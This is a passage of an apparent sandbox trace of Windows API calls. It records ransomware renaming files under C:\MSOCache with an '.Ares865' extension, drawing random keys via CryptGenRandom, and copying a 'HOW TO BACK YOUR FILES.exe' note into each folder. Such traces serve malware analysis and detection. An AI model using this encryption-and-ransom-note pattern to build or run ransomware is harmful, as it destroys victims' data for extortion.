Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.ares865"), dwFlags=0x1) returned 1 [0078.090] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.090] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1231) returned 1 [0078.091] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0408) returned 1 [0078.091] CryptGenRandom (in: hProv=0x2f0408, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.091] CryptReleaseContext (hProv=0x2f0408, dwFlags=0x0) returned 1 [0078.093] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0408) returned 1 [0078.094] CryptGenRandom (in: hProv=0x2f0408, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.094] CryptReleaseContext (hProv=0x2f0408, dwFlags=0x0) returned 1 [0078.095] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.095] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.095] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.095] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1852) returned 1 [0078.096] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0408) returned 1 [0078.096] CryptGenRandom (in: hProv=0x2f0408, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.096] CryptReleaseContext (hProv=0x2f0408, dwFlags=0x0) returned 1 [0078.098] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0408) returned 1 [0078.099] CryptGenRandom (in: hProv=0x2f0408, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.099] CryptReleaseContext (hProv=0x2f0408, dwFlags=0x0) returned 1 [0078.100] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C" [0078.100] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f01e8 | out: hHeap=0x2b0000) returned 1 [0078.100] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0078.100] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned 62 [0078.100] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C" [0078.100] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.100] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.109] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.109] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x600dd680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x600dd680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.109] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.109] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.109] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.Ares865") returned 86 [0078.109] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.ares865"), dwFlags=0x1) returned 1 [0078.110] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.110] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1383) returned 1 [0078.110] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f07c0) returned 1 [0078.111] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.111] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0078.113] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f07c0) returned 1 [0078.114] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.114] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0078.114] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.114] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.115] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.115] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2362) returned 1 [0078.115] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f07c0) returned 1 [0078.116] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.116] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0078.118] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f07c0) returned 1 [0078.119] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.119] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0078.119] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C" [0078.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0160 | out: hHeap=0x2b0000) returned 1 [0078.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0078.119] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned 62 [0078.119] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C" [0078.120] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.120] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.124] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.124] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x60129940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x60129940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.124] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.124] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.125] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.Ares865") returned 83 [0078.125] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.ares865"), dwFlags=0x1) returned 1 [0078.125] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.125] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=811) returned 1 [0078.126] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f01e8) returned 1 [0078.126] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.126] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.128] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f01e8) returned 1 [0078.129] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.129] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.129] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.129] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.130] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.130] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5884) returned 1 [0078.131] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f01e8) returned 1 [0078.131] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.131] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.133] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f01e8) returned 1 [0078.134] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.134] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.136] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr" [0078.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0008 | out: hHeap=0x2b0000) returned 1 [0078.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0078.136] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned 71 [0078.136] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr" [0078.136] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.136] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.140] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.140] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6014faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6014faa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.140] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.140] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.140] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.Ares865") returned 89 [0078.140] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.ares865"), dwFlags=0x1) returned 1 [0078.143] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.143] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1458) returned 1 [0078.143] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f01e8) returned 1 [0078.144] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.144] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.146] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f01e8) returned 1 [0078.147] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.147] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.147] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es" [0078.147] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cff70 | out: hHeap=0x2b0000) returned 1 [0078.147] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0078.147] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned 71 [0078.147] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es" [0078.147] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.147] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.151] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.151] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6014faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6014faa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.151] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.151] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.151] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.Ares865") returned 89 [0078.151] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.ares865"), dwFlags=0x1) returned 1 [0078.154] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.154] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1457) returned 1 [0078.154] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f01e8) returned 1 [0078.155] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.155] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.157] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f01e8) returned 1 [0078.158] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.158] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.158] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en" [0078.158] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfed8 | out: hHeap=0x2b0000) returned 1 [0078.158] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0078.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned 71 [0078.158] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en" | out: lpString1="C:\\MSOCache\\All 